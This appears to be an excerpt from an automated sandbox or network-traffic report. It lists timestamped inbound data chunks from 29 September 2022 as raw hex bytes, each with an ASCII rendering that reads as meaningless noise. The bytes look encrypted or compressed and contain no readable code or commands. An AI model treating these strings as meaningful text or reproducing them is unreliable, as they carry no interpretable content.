                                                                                                                                                            2022-09-29 12:45:02 UTC7939INData Raw: 6a f6 30 73 64 fa b9 34 25 4b a1 3b e4 18 7a 71 8a 17 aa 38 ca 2e 9c d9 e4 6d 2e 04 f5 25 81 25 5b 4e 2f 67 97 82 a6 39 fc 23 9f 8f 11 93 bb cf ae 9f e4 ae 07 f1 5e a5 83 5f 0c a1 66 dd 06 18 09 75 2a 7e 73 34 69 eb 34 fb df 19 ec a8 be bd ee ac 4c 91 2b 3b e4 6f e8 1e ca a4 53 9a 2c 6e cf 7f 06 62 ad a1 c9 3d 00 4d f3 4b ab ed 07 7e c6 dd 82 9d b0 60 8e 89 a1 b3 41 b3 e7 83 5a 59 e1 32 85 c7 a0 d1 5d 67 87 03 3f 75 3c 4c 68 f2 a5 29 c2 fd 71 1a 8f 58 2a 64 a0 50 9f bc 8a 8b f6 64 03 93 5c 3f 07 4d f2 f2 a2 00 d5 25 04 4d 45 fe 8f ab db 05 78 97 6b 21 26 ea 41 a5 9a 1d dd 23 9f f0 c6 33 b2 5b a3 78 ba 83 a4 46 0b f6 7e 0c d1 f1 27 d7 fc 6e f5 08 9d 5d 8e 87 91 28 51 05 d4 64 59 0b 39 98 67 0a aa e4 9d 24 13 55 0d 9d 50 76 bd e8 5a ce 93 9f 5d 7c c2 94 17
                                                                                                                                                            Data Ascii: j0sd4%K;zq8.m.%%[N/g9#^_fu*~s4i4L+;oS,nb=MK~`AZY2]g?u<Lh)qX*dPd\?M%MExk!&A#3[xF~'n](QdY9g$UPvZ]|
                                                                                                                                                            2022-09-29 12:45:02 UTC7955INData Raw: f9 e5 9e aa 70 41 ee c2 99 15 b2 a3 37 40 e2 8c 65 e8 70 9c 27 dc a7 b1 2d 31 2f fa 6d 7b 95 54 c4 02 08 46 02 46 4a a9 9d 35 ba ef 8d 93 3e f4 fc 60 72 c2 07 da c1 dc 6c 1f a5 ca 32 27 fb 87 d7 86 42 05 2e 30 09 d3 28 53 aa fd fc a5 46 6e 4e a8 03 a1 43 31 2c b6 33 92 2a 27 04 61 5e 0f 46 ae ba 01 22 a1 2d 7d c0 32 e8 a1 c8 f3 5a 48 38 0d df 17 a0 9b ef 32 44 65 e0 0f 6f 9c 6f 8a c0 89 78 2e ae f9 66 90 55 d0 33 ea d0 aa 90 f0 01 4c d7 09 b4 61 d3 ea 92 3c c8 e6 eb aa d2 5f 8a 7c 87 6a 5e 92 d0 f3 b8 a0 75 82 40 51 e7 bc 95 0a 80 0f 3f 40 8f 42 14 23 bd ff 79 43 9e fa 3b c9 64 d3 c8 eb b7 e2 56 d4 38 cb d3 c1 bb b1 d2 e8 75 32 e7 94 68 54 37 40 4c 3f 6f b4 36 f1 12 1b 9a af 53 8a 91 2c 24 2d 63 9d 13 08 27 7e 3c ed 35 20 c5 f0 ba 74 82 32 09 f1 a2 a4 c5
                                                                                                                                                            Data Ascii: pA7@ep'-1/m{TFFJ5>`rl2'B.0(SFnNC1,3*'a^F"-}2ZH82Deoox.fU3La<_|j^u@Q?@B#yC;dV8u2hT7@L?o6S,$-c'~<5 t2
                                                                                                                                                            2022-09-29 12:45:02 UTC7971INData Raw: e1 59 91 57 71 ad b1 60 d7 58 a5 94 5c 8d d7 2e ca 98 e3 91 ca d0 02 fe 51 c1 3b 97 ca 9f f2 63 0c ed 65 e5 1c 22 d7 08 f8 4a 1a bc 53 ae c9 0d c3 7e 32 df 1a 57 0e a9 90 f2 21 0a 0e a3 18 65 6d 81 dd 42 9c 36 95 74 79 f9 ed 0d 80 ec d6 11 c9 db ce d1 12 17 b3 5d d2 36 d6 97 c1 9c 8d 1b ff bc 63 51 d2 9c 10 1a b8 e3 d2 33 d2 35 a1 42 bb 92 b6 ec 73 80 95 f9 fd 9d 76 06 8e e9 36 6f a0 6e 07 24 8a 21 b4 64 d4 40 2f fc 02 5b 1e 95 75 91 5a 2d 83 d5 4e e4 d0 81 c1 92 4a 61 b5 92 33 82 d1 5b 18 ae a0 88 11 9f 03 90 1f 83 06 7c d5 49 ef 8a 8a 79 14 a8 9e c3 07 f2 28 43 0b a7 7b 7a 91 1b fc 73 e0 ba 9d c7 ef eb 4e 5f 6b f5 28 6e 0f d4 28 53 cd ea dc 7d 92 67 65 c5 d5 a3 02 92 79 7f f6 e2 68 8c 1f 2f 00 33 94 20 62 96 15 25 d0 33 70 b7 fb 5b 61 0b b3 cf a0 b7 56
                                                                                                                                                            Data Ascii: YWq`X\.Q;ce"JS~2W!emB6ty]6cQ35Bsv6on$!d@/[uZ-NJa3[|Iy(C{zsN_k(n(S}geyh/3 b%3p[aV
                                                                                                                                                            2022-09-29 12:45:02 UTC7987INData Raw: ab 0b 2e 2d 4a f5 26 e4 61 cb 85 ac 1a 71 5f e1 7e 8a 01 52 58 21 0c a6 58 56 d4 bd 71 18 fd 36 e7 63 c8 7d 70 78 ae 87 87 c6 44 4e 50 ae ad 2c 13 19 b1 31 5c d1 4a 4a ec 14 c1 e7 32 0b b6 13 70 8c 7f 8b c2 98 fb f9 66 54 55 73 b7 81 e6 ac 9b 45 ee cb 23 68 47 a8 6b 92 f7 a5 1a af fa 01 e1 c2 46 14 d6 6a ab e0 2b ec c5 c6 c6 31 ae bc fd c8 6d de a2 d1 1f 3d 46 04 29 d6 7a 76 ed 53 5d 30 2b 86 8c 77 94 4e 1f 3c 07 52 21 1c 11 95 ec 9e 02 99 e1 a7 5d 90 4f 2c 9e f5 b2 13 68 ef c8 7d 8c 36 d0 1c ef d6 34 66 58 9a a6 54 bf 70 e4 f9 77 2d ec a8 fb 0b 0e fb af e3 57 70 06 75 c9 58 af 70 56 0a 95 f9 59 26 7b 87 bc ba af 08 cf 32 1b c8 20 a1 71 ac f0 50 c1 3e 11 21 06 72 5b c9 8d fa 47 e8 56 7a 34 b1 6c e0 47 1a 5f 93 83 d7 6a 55 d9 1b 39 76 a9 c1 23 00 97 f9 cb
                                                                                                                                                            Data Ascii: .-J&aq_~RX!XVq6c}pxDNP,1\JJ2pfTUsE#hGkFj+1m=F)zvS]0+wN<R!]O,h}64fXTpw-WpuXpVY&{2 qP>!r[GVz4lG_jU9v#
                                                                                                                                                            2022-09-29 12:45:02 UTC8003INData Raw: 6e 6e 56 ed fd 3f 1e 22 19 56 40 32 63 88 74 d3 b6 c2 1a 58 fc 2e 92 71 1d 96 cb 25 d1 73 c3 be f4 8e 68 95 a6 79 1a 56 3c 89 c3 50 7d 21 ca 75 84 4f d1 f9 d0 11 6b 4b 6c 3f 5d 8c ef 1b 48 97 42 20 9d 9e 4f 5c 48 67 5f 46 f7 66 b5 18 60 9a 3f 0f 74 b7 43 03 17 a8 31 da e1 29 86 6b b4 e1 ef 85 08 af 0c f3 e3 d5 d1 04 53 ac 5b 35 e1 ff 45 c5 99 0a 78 5d 50 29 26 fd 44 ad a7 09 b2 ec d0 98 1e 54 79 e8 e5 41 d3 65 8a 4f d9 37 18 a2 df 0a ce 7f a9 36 9a da b7 f4 3f ae f2 ef 6f 3c a6 e8 fa f7 91 08 2e cd 6b ef fd b6 0d 2b 25 8c 5b 75 ee 53 58 e3 90 fd 2f 29 d7 5e d2 97 a0 c6 0e 59 7a 1c 82 3b e5 a5 74 cf da 72 d5 db 58 05 27 51 64 e6 3d 0b cd 05 22 4b f8 20 70 12 94 4c 54 c8 ad 58 85 60 31 70 03 a6 85 e4 99 22 9b c0 0b 21 5a 31 17 f1 87 c1 f6 9c 2b 41 16 64 6c
                                                                                                                                                            Data Ascii: nnV?"V@2ctX.q%shyV<P}!uOkKl?]HB O\Hg_Ff`?tC1)kS[5Ex]P)&DTyAeO76?o<.k+%[uSX/)^Yz;trX'Qd="K pLTX`1p"!Z1+Adl
                                                                                                                                                            2022-09-29 12:45:02 UTC8019INData Raw: 89 f4 a3 8b d3 1a f6 2f 36 74 ba 47 6e aa c6 fd 92 f3 f2 6e f9 c9 48 d8 d7 55 ca ef 34 3b e0 ed 5d 7b 02 98 fc 14 80 32 16 73 06 50 d8 4d 31 65 e9 64 36 26 43 61 2b c5 8f 47 ab de 4d 29 cc b7 1b ae 57 71 be fa ce eb ec 52 31 1f eb 83 61 73 57 11 65 9f 45 69 02 dd fd 83 05 e1 d4 c9 63 bb e5 f9 5a 6b 61 e6 d4 7f 3d 90 c7 cd 69 fb b6 3b 04 65 ef 08 58 04 4b 1d ca 1d 5c 1c 79 33 c4 2b de 45 1d 05 39 a6 55 bd 6a 8b 3b 42 81 ed a9 64 43 d1 6d ba 0e 37 a6 c1 d2 92 fd 40 e6 33 fa 8d 74 b4 ed 9c fd 83 97 49 b1 c0 ed b4 d0 5d be 36 9c 6e 76 68 5b 2f c7 02 19 70 bb c0 30 e8 6d 0e 63 7b fa e0 dc 1a fc e8 44 33 9b b7 20 ab e5 11 af d7 2d 3f ba 4e 90 5c b4 04 28 3d e2 1d be 9e 02 74 d6 14 c1 6e 93 cb 8e 1f 6b 3a b2 a3 d5 bc 8a aa 8b 25 c7 95 b5 d3 3d bb d6 cb d3 cf c1
                                                                                                                                                            Data Ascii: /6tGnnHU4;]{2sPM1ed6&Ca+GM)WqR1asWeEicZka=i;eXK\y3+E9Uj;BdCm7@3tI]6nvh[/p0mc{D3 -?N\(=tnk:%=
                                                                                                                                                            2022-09-29 12:45:02 UTC8035INData Raw: 1d ca ae 88 65 5d 78 40 55 b0 fd 2e af fa 89 bf 0d 18 6c 9c d8 49 01 0e 2c 9f a2 98 d1 26 e2 33 2a ec a5 f6 85 d3 d7 02 3a aa 08 8b d3 05 2a c0 85 62 82 2b 79 3e f7 80 00 bd f8 8b 94 b7 9c 2c d2 b2 c8 7f 1e ab d9 70 8f bc 5d da 70 82 14 27 e0 e1 83 d5 f5 a5 c0 60 0c d0 bb e2 a6 54 75 d4 01 3a 16 0c 2f f0 55 86 5f 20 b0 d5 53 ef 58 1e 22 e4 35 89 57 ec 21 de 3d 05 82 28 f4 84 92 07 96 9e 8c 10 f9 34 fa 6b ac 05 98 5a cb c1 ac 12 61 a9 b9 03 55 ed 9a 44 fe f2 4f 79 74 73 73 c0 ab a1 6c 25 1c c5 f1 c8 1a f6 ff 65 56 d8 e5 f6 ed 1f cb d8 f2 1b 6b 7b 28 43 d3 89 59 c3 89 ff c1 53 fe 5c 6a 84 2c de ce b8 c0 45 78 36 71 6c b9 35 90 6c fd eb a7 bb a6 e7 8b 14 4f 74 a7 17 e0 5e bd 40 e4 c9 19 82 c6 25 7a 86 10 a7 e9 94 e7 9d 3a 51 64 cd 8b 22 8a ca 81 21 bb ac 16
                                                                                                                                                            Data Ascii: e]x@U.lI,&3*:*b+y>,p]p'`Tu:/U_ SX"5W!=(4kZaUDOytssl%eVk{(CYS\j,Ex6ql5lOt^@%z:Qd"!
                                                                                                                                                            2022-09-29 12:45:02 UTC8051INData Raw: b8 c6 61 02 28 6b b1 25 7f d5 5e ab a0 14 93 02 b1 31 74 28 83 85 da 1b b3 72 0b 28 29 a7 cb 63 d6 6f c4 6b ae 0f 0e f4 f8 f3 34 60 66 22 66 43 6d 86 da e5 39 22 12 ec 95 5e e8 e8 90 03 ef 2e 13 99 74 94 d4 01 a5 d4 09 66 0c 83 54 e5 31 04 cb 81 c1 5c 20 9c 22 04 4a 55 e6 21 33 79 3e 70 25 19 df 70 65 00 f5 82 bb a2 6a 78 5e ec 2b 8c ec d9 88 98 b2 ff 22 90 09 e2 5c 20 b3 f1 e8 39 ec af 22 4d 26 46 e0 5b 2a 3d 45 cd f1 bf fc 08 a8 15 9f d3 66 33 d0 b3 39 96 96 b8 0c 06 3d cd 53 49 ff 17 02 4b 46 35 e2 91 c3 c6 d5 eb 28 d3 8e 31 a6 30 13 0a df 17 18 64 60 d4 46 e9 88 27 f7 71 c7 53 cb c8 5a 52 87 7c eb b9 be 09 6b e4 6c b6 f4 5f 12 2b a4 c9 6d 3b 79 01 9d 55 1d 46 23 70 ed a0 cd e6 3b f1 1a aa 01 ef 42 10 77 b1 26 42 91 8b d4 7f bb fc 24 04 9f 58 b2 c9 2f
                                                                                                                                                            Data Ascii: a(k%^1t(r()cok4`f"fCm9"^.tfT1\ "JU!3y>p%pejx^+"\ 9"M&F[*=Ef39=SIKF5(10d`F'qSZR|kl_+m;yUF#p;Bw&B$X/
                                                                                                                                                            2022-09-29 12:45:02 UTC8067INData Raw: df 38 1c 7b 3b 2e 1e 75 82 80 c6 6b 66 e8 b5 6a 8d 11 ce 4a e6 09 c8 65 65 b8 49 d5 35 30 ca 8c e8 0b ff 82 f9 de 0e 17 13 ee 16 08 be 40 f2 eb 23 fc fd 9a c9 4d 37 61 88 d3 e9 75 b6 17 90 76 76 a3 c6 9c 4e 26 b3 31 6d e0 b3 17 85 12 42 e6 72 a7 c5 1d 4d 9f e5 24 8c d5 2f fd af c2 12 94 5d 60 8f b2 82 0e 20 18 1e d0 c2 95 4a 58 6a c9 c1 4b 2c f3 1b 0b c6 7a d8 84 8a d1 23 4e d9 8b 2d 4b 37 d3 bc ff 0a 10 bd 39 9e 29 0a 80 a4 2f 50 89 65 81 71 0c d3 3e e9 df 16 07 ed 54 f0 5b 71 e5 dd 6b f4 02 75 b6 92 60 ba c6 ff 9a b5 a9 9a 8a ab 0c 2e e7 a7 1d 40 73 18 99 65 3c 75 94 f6 cf 40 0a 32 6b 13 ca f1 73 59 0d cb a5 6c 1c 83 ad 6c 6f e5 b4 a4 fa e5 7a 4d f1 98 e8 94 cd 17 70 5a 33 bb 30 66 86 37 30 13 44 3c 70 ee 28 cf f8 26 8d 69 9c 30 b7 16 93 69 1f 99 34 1b
                                                                                                                                                            Data Ascii: 8{;.ukfjJeeI50@#M7auvvN&1mBrM$/]` JXjK,z#N-K79)/Peq>T[qku`.@se<u@2ksYllozMpZ30f70D<p(&i0i4
                                                                                                                                                            2022-09-29 12:45:02 UTC8083INData Raw: 9c 76 96 0b 81 5f 46 47 4e 27 3f f4 f3 17 33 77 d8 ec 34 a8 d8 3d 3a 2b 29 34 0c e5 8d 3b 28 28 4a 07 e3 83 2a cd 36 84 89 ba 49 69 a3 04 30 1d 25 41 c0 37 8a f1 6a 07 c0 25 ce ff b3 1c 62 cc f3 cf ec 55 a1 fb 3c be 4e 34 e5 5c 2f 20 67 72 33 f6 e4 ce 7f 4e e3 92 27 9c bb 33 3a 2b 69 49 e6 3f f2 d4 80 09 c6 bc 75 23 ac be 28 4e 05 14 89 71 8f ff fb 6a 4e b6 be aa 66 20 5d 15 a9 9e cf cc f9 80 70 e7 53 20 7d 30 b6 d5 01 d6 99 fe c2 42 d1 1f 71 8e 73 ad 53 43 71 9c 8b c9 ea 02 d0 6e 35 74 f8 ca 75 21 02 8f ed 7f 32 04 d8 d2 6b 06 3c 58 f7 c5 28 3b aa 56 e4 1e 9e 5e 8b 49 a8 2c 84 81 21 11 35 e6 cc 1f 80 f2 ae ff 82 11 f8 ce d5 3b 24 cf d1 05 3c 05 97 bc 9e a7 6e 78 b7 75 7c 05 65 63 55 af 39 d7 0b fc 14 f3 49 a4 fd 39 aa 43 00 e4 c1 d2 80 18 eb 3b 2f 22 60
                                                                                                                                                            Data Ascii: v_FGN'?3w4=:+)4;((J*6Ii0%A7j%bU<N4\/ gr3N'3:+iI?u#(NqjNf ]pS }0BqsSCqn5tu!2k<X(;V^I,!5;$<nxu|ecU9I9C;/"`
                                                                                                                                                            2022-09-29 12:45:02 UTC8099INData Raw: 05 e8 79 46 ee 3d f2 dd a6 9f 6f c9 e5 f9 8e d7 aa e8 70 83 04 86 4f 5f f8 04 64 38 e2 ef 56 d0 4e a7 a2 df 47 13 5e cb c4 29 e9 32 5d 4b 0b c9 ac ec 5b 87 29 7f fe 75 ee 22 f9 ca 74 f3 82 76 48 8e f4 4e 3e 18 49 e9 99 2d 2a 45 74 bd 36 4f 26 16 0e 0f 6a 7e 03 e2 0d 42 81 e4 de 8c b9 df ce ed 43 2a 40 87 7c 02 49 a5 8a 4a 60 30 dc 4d 7f ca 2a b3 3a c4 ed 52 f7 d0 74 a5 dd 28 00 a0 95 eb 79 01 e3 fc da af 6c 62 b9 c9 a9 40 8e 48 0f 69 15 d3 e4 16 6d 20 6f d4 dc d5 aa ee c7 67 f6 0a ba 67 c4 ec b2 0e 27 e6 79 85 09 c7 ee a4 a8 3e 59 c5 2f 4e c7 54 9e 8c e0 d3 6d 5c 92 c3 ad b6 27 02 8d fb 8a 29 c6 32 ff 26 d3 69 15 5a 53 e0 8e 8f ba b3 8b 4c 0c 0f 85 2e a3 7d 19 51 20 ea 24 1a f9 03 2b 46 69 2a 87 92 32 96 16 7a a0 48 3f e9 e2 02 9c 64 c0 93 87 57 59 f4 88
                                                                                                                                                            Data Ascii: yF=opO_d8VNG^)2]K[)u"tvHN>I-*Et6O&j~BC*@|IJ`0M*:Rt(ylb@Him ogg'y>Y/NTm\')2&iZSL.}Q $+Fi*2zH?dWY
                                                                                                                                                            2022-09-29 12:45:02 UTC8115INData Raw: c6 6c a6 87 00 bc ed 04 74 20 50 67 4c 02 34 47 1f 6e af 9b 94 00 2d f5 0d 39 e7 4a ec d9 05 a5 cb 91 23 68 31 5e 24 73 46 0a af 2a 84 57 3f 44 13 ec bc bf cd 09 1f 76 74 41 ba 4d 03 71 fd 44 d8 20 c6 d0 aa 24 0e 17 aa 13 a8 87 b3 34 f9 8e fc 59 68 52 44 76 dd 03 a4 5f d8 9a 82 19 25 63 66 95 70 e7 3b 28 dc ae 54 d4 b4 55 c4 70 c0 a6 44 85 87 e4 b0 db 11 ac 9d d1 a0 c8 dd ce 67 71 a8 ff ca 6c d9 cf 85 22 d0 7d 01 60 42 97 30 c2 60 43 f8 70 32 d6 a8 1e b4 2a 1b 74 9c 17 98 3f 03 95 bc a7 f3 05 ca f8 e0 92 1a 79 9b 69 b5 57 e8 0a 87 ce 63 0a d6 8c 7f de ad ff 63 b5 55 23 c0 04 aa 11 6f 74 ac 24 04 04 eb 4c da d4 42 e7 38 88 50 ce 7a 9f 07 22 7d 18 91 2c ba 23 f4 e4 ad 9f 59 2b 89 56 59 52 4a 0c 19 e1 df 8e c1 50 bc 75 dc 6a 93 5f 6b 75 32 f1 fc 7d 90 43 46
                                                                                                                                                            Data Ascii: lt PgL4Gn-9J#h1^$sF*W?DvtAMqD $4YhRDv_%cfp;(TUpDgql"}`B0`Cp2*t?yiWccU#ot$LB8Pz"},#Y+VYRJPuj_ku2}CF
                                                                                                                                                            2022-09-29 12:45:02 UTC8131INData Raw: d0 0b b7 46 8b a2 79 f3 69 f6 a3 72 fd 1c 78 d6 3b cb 23 67 41 12 a5 03 8b 2d 11 03 77 1e 7b 51 45 0a 2c 6f 7c 5d 3f c5 f7 e0 77 69 80 5a 19 64 37 91 42 73 be e6 42 bf 5d 85 22 9e d4 50 d2 b8 43 bc db 04 d8 c1 09 84 47 ae 95 93 71 cb 45 55 d0 80 29 58 62 10 26 5d d3 3d 1c 8a 21 dc 0f 8a c4 6f 58 9d eb 0f ab 9a d2 76 12 18 7a 1f 2a fb 98 2d 6d 93 6c cb b6 d6 41 9c 9e 56 24 9e 71 7d 3e 7f 2f 61 24 47 1b be 4c 02 24 d1 c1 21 c3 87 b5 d6 85 ab 04 f9 85 5c 15 f9 8f b6 40 e9 ac 81 f6 5e 51 98 b4 da f7 3d 1f 0d f3 b2 e8 91 7f 39 89 98 64 b8 ea 82 31 d8 3d 67 f8 06 e7 11 8b ca 77 3c b8 0c b4 0e 3a d4 fa 3b 1b 47 5c a5 98 6e f6 35 e5 8b 05 90 bb 9a d1 5d 4f 6b 45 29 4a 94 4a 45 cf f7 09 ba b9 e6 02 6e e1 50 ee e9 ee aa 60 ac 53 47 d7 6d e1 3c b2 83 06 8b cc 6f 1a
                                                                                                                                                            Data Ascii: Fyirx;#gA-w{QE,o|]?wiZd7BsB]"PCGqEU)Xb&]=!oXvz*-mlAV$q}>/a$GL$!\@^Q=9d1=gw<:;G\n5]OkE)JJEnP`SGm<o
                                                                                                                                                            2022-09-29 12:45:02 UTC8147INData Raw: d7 d4 2e ba af a2 2c 99 d4 6e e5 00 9d 3f a5 1a dd 1a c5 9b 5c 96 d1 ee d5 ea 0a 5c 29 2f 66 0b a5 d8 cc 5f 8b 24 d9 6f 12 67 00 48 a8 cf a9 da 69 2c ed 08 56 51 7a e0 99 c6 93 0e 61 b2 aa e5 79 a2 13 11 4e d8 59 99 34 c5 df 59 90 b6 66 d3 7e 17 38 45 2b e3 ca 4c a3 d7 a9 53 41 82 3b e1 c4 d0 0c a3 9c 11 a5 f6 0c 26 a9 83 f1 88 12 9f 9a f4 97 97 70 c1 50 da 15 56 7a fd 6c 87 1a b7 92 ea 36 32 00 18 52 94 a7 69 44 8b d8 2c c0 34 bc 30 27 68 1e 87 f2 6d 06 b0 1e 85 53 df 29 c3 ef 70 f5 b9 26 f6 25 85 f6 c3 45 1f 64 d4 55 04 7f 99 10 26 3e 71 f1 90 2d 10 72 98 73 9f 7d f2 b5 84 42 37 a5 d4 d5 ee 28 b6 d6 5d ca 11 fd 97 02 fd a5 5b 5c 60 4f 89 87 32 3f d0 46 d1 76 0e 84 88 1f 94 c1 35 a0 d7 8f d0 5c 3a 5d b2 e4 4f ce a6 85 3f 60 6b 82 74 44 f8 17 79 d6 43 da
                                                                                                                                                            Data Ascii: .,n?\\)/f_$ogHi,VQzayNY4Yf~8E+LSA;&pPVzl62RiD,40'hmS)p&%EdU&>q-rs}B7(][\`O2?Fv5\:]O?`ktDyC
                                                                                                                                                            2022-09-29 12:45:02 UTC8163INData Raw: 0b d3 7f 00 b0 c4 ad 18 df 70 49 6f 65 d9 b4 b8 c1 0e a0 69 5f 7f 7f 8c b2 8c 0c a5 8c 13 cd 06 8e 3b 46 ba a0 5e ce ad 0b dc e9 15 70 94 ea 51 32 9e 5e 1f 4e 66 f6 5b f0 97 3b 24 03 b5 53 ce 69 e3 4d 91 15 f5 98 c3 2f 50 46 3a 0f d6 a7 63 63 cc a3 4d 0c 14 d6 5c eb 31 28 e0 98 8f 36 26 81 4e 37 81 64 27 40 1d f7 6c e9 8d 60 76 a6 7a 3b bf d1 1b 57 fc ac dc 13 a3 33 75 3b 95 c8 5c 2a 9f c3 83 48 80 16 cd e8 a4 d3 73 f5 9e 2e 73 8e e1 db 6c 98 6e 04 c0 3c 37 5d 75 ac 2f 03 0c 45 70 78 f7 21 56 c8 18 cf 55 d4 89 f0 48 96 d2 6f 13 f1 bf e5 85 7b e2 69 aa ab 6a 8b ba 20 7c 22 4b 51 70 4a db 88 36 ec 96 a9 82 87 9b 68 52 c1 4c cf 5e 81 46 8b 9d bb 3c 1f 82 80 9e da bc fb 54 41 ee 3d 23 f2 19 7c 02 0b d6 43 37 dc f3 76 a9 5e 72 e0 8e ec 39 3a ab 55 f0 f7 37 cf
                                                                                                                                                            Data Ascii: pIoei_;F^pQ2^Nf[;$SiM/PF:ccM\1(6&N7d'@l`vz;W3u;\*Hs.sln<7]u/Epx!VUHo{ij |"KQpJ6hRL^F<TA=#|C7v^r9:U7
                                                                                                                                                            2022-09-29 12:45:02 UTC8179INData Raw: 4a 7e fa 38 4c ef c9 de 9a ac 73 97 fc 3d 71 1d 2c 0e cc 91 7d 64 d2 22 65 45 7e bf 60 8f 89 cf e2 53 14 3f 51 0d 21 8f fb cb 5d b1 7b be bb 81 62 85 50 6b 97 86 33 7e 07 16 c0 93 87 ef 8c 3e 81 57 fd b4 16 c1 51 75 0a e4 a3 ea 56 95 d5 fe 49 55 0f d5 32 6d b0 6d 82 cb 5e 2c 23 59 da c6 58 80 3d 2b 5e 53 4b 53 69 cc 7e 4e 6a d3 5f d6 63 c2 b4 3f 6e 53 6e 51 61 82 66 1b 83 1f b6 bc 73 62 ec f0 46 56 11 34 2a 8e b8 eb 0b 6d 6a a7 b4 24 e6 87 f9 9d ec 7c c0 a0 10 4c 88 00 30 f8 70 4f 31 bf 5b 56 1a 91 8a 08 ee 27 94 fa 1e 11 bc f6 cd 70 10 f6 6b 3b b1 7f ef 27 c3 ae e9 e3 e1 6c de bd 53 fc 84 9f c6 a0 1d 9f a4 46 65 a6 11 0f 3d 8f 72 89 82 1a 79 06 c3 6d d8 b9 e2 71 ec 8a 88 25 e0 82 ac ab 12 c1 4b 92 7e 89 5d e1 43 2c 92 bf 8f de d5 24 43 bb 8b 80 5d 19 a9
                                                                                                                                                            Data Ascii: J~8Ls=q,}d"eE~`S?Q!]{bPk3~>WQuVIU2mm^,#YX=+^SKSi~Nj_c?nSnQafsbFV4*mj$|L0pO1[V'pk;'lSFe=rymq%K~]C,$C]
                                                                                                                                                            2022-09-29 12:45:02 UTC8195INData Raw: 27 8e 7a 21 12 ee 59 78 eb 42 7f ec 3c 22 e0 34 ef 26 eb 89 2c b5 71 fd d8 49 14 fe 88 c6 f5 97 f5 cc c9 2c 5f 60 e7 3f f6 b2 cf f2 b3 f5 51 26 f7 e0 12 60 ab fa 65 19 21 24 26 b9 bb 4c 19 19 0b f4 7e b2 8d 0a e9 64 48 b0 f8 14 70 0e 0f 79 83 87 a1 8c 2f 64 9b ae 97 ba 41 56 a7 69 a3 7d ce 65 39 a2 2b 51 77 3b b9 5e ae 31 92 09 0a 88 ac c3 45 14 4b 5c b3 eb 94 e4 22 3c 2f ba ea aa 17 34 3c a7 87 7d f3 61 9d 22 a9 dc cd 5c a5 42 d1 65 dd 05 bc d7 8d a7 88 f2 a1 a0 2f f0 08 73 64 9d d6 a1 b9 4f 33 af 5b 69 e7 e4 b8 67 2d 1b 1f d4 b8 97 d3 44 6d e4 c2 4d 80 d3 8f cb 1b ba 32 1f b0 71 e8 f6 fc ba 33 88 8b 21 f2 5b 0f 62 46 41 3c e5 8f 52 c1 38 39 2d 40 7b 79 67 a5 e6 7c f5 28 1c c4 3c c6 1d b8 37 9d 74 d6 c3 99 86 e2 c8 d9 90 53 60 1f ba 35 41 ad 02 f8 5a ba
                                                                                                                                                            Data Ascii: 'z!YxB<"4&,qI,_`?Q&`e!$&L~dHpy/dAVi}e9+Qw;^1EK\"</4<}a"\Be/sdO3[ig-DmM2q3![bFA<R89-@{yg|(<7tS`5AZ
                                                                                                                                                            2022-09-29 12:45:02 UTC8211INData Raw: 95 ec 62 8c fa 31 2a ee ac 4b 8f 43 27 8a d5 fa 32 f6 42 30 d0 57 ba fa 43 43 4e df a6 16 f7 2d 18 c6 cd 8f 54 92 6b 5c eb a8 1f c4 0d ab 58 81 da 71 40 8f 94 e3 fb 7c a5 e4 3b 69 7a 87 7e 88 9d 12 77 6f 63 c7 44 13 60 23 9c d6 79 49 13 95 c7 fc b4 47 5d 2b 54 94 c4 d7 bb 4c b5 79 77 7f 6e 55 3d 67 6d 80 8b ff 86 53 06 33 fd 89 6d 17 3e 3b b8 10 6b 7b ab 43 6f c5 39 52 d7 07 40 44 26 60 3e d3 54 1c 1f 93 55 95 c0 6c a6 45 11 93 dd 57 23 ae 09 01 81 b9 8e 09 df 46 9b 09 f7 b4 e2 72 16 21 27 fb d4 7d dc 46 e8 c6 b1 e5 b7 3d d1 fc 9a 88 88 ce fc d9 cf 84 d8 16 0f e1 5a 26 21 2e 0a bb cf 7d e2 68 47 18 19 a6 1f c4 3b f5 00 eb a1 b5 f8 e5 84 2a 02 50 ab f1 37 73 c3 a1 ec fd 9e f9 53 5b a6 56 ac ce 59 19 46 ad 03 3e 4f 56 ee 51 b2 65 ed e9 f4 a4 b3 ce 8c e3 a0
                                                                                                                                                            Data Ascii: b1*KC'2B0WCCN-Tk\Xq@|;iz~wocD`#yIG]+TLywnU=gmS3m>;k{Co9R@D&`>TUlEW#Fr!'}F=Z&!.}hG;*P7sS[VYF>OVQe
                                                                                                                                                            2022-09-29 12:45:02 UTC8227INData Raw: ff 3c d5 02 80 08 2c 33 63 05 57 87 53 c8 0b fd 02 74 ca 37 be 4b a5 bc 74 de 11 43 11 5e 4d 8b e7 2b 49 01 5b ab 10 95 0c 19 23 13 dd 2d e8 45 9a f9 59 60 30 07 80 36 99 a6 d7 c6 75 17 05 5c 0e 89 9a 73 3c b6 5d 2f a9 66 6e 6b a7 16 a8 3d 94 21 75 87 82 1c 69 7c 9a ca b0 b2 e5 d1 65 08 43 40 ce bf e1 27 c3 8b 60 c6 69 e9 1a 9a 43 78 9d d7 94 65 3a f5 28 13 3b fe 9e 00 ef 90 76 23 24 f5 8a 7b dd 10 f8 f0 d7 e1 35 96 1c 85 27 30 ef 25 2a fe b5 b7 94 0d 80 a2 8c 09 f6 4e 49 fe 2f 36 59 66 0b 9e a8 01 25 48 a3 bb 40 bc b3 c4 ab f4 41 ff 1b 2b 06 09 58 ab b3 72 38 a1 7b 01 ad 29 33 79 ff f3 99 db f1 be 62 75 5b 43 ff 76 6e 97 d7 0c 6a a2 bb 14 cc 33 ea 4a 1a 34 90 ce 1b 46 e5 f0 7a f6 52 13 f6 28 dd 0e 0d 0d ac 2d fa 41 b6 d3 43 c8 a7 15 91 3f 01 a4 2d e8 70
                                                                                                                                                            Data Ascii: <,3cWSt7KtC^M+I[#-EY`06u\s<]/fnk=!ui|eC@'`iCxe:(;v#${5'0%*NI/6Yf%H@A+Xr8{)3ybu[Cvnj3J4FzR(-AC?-p
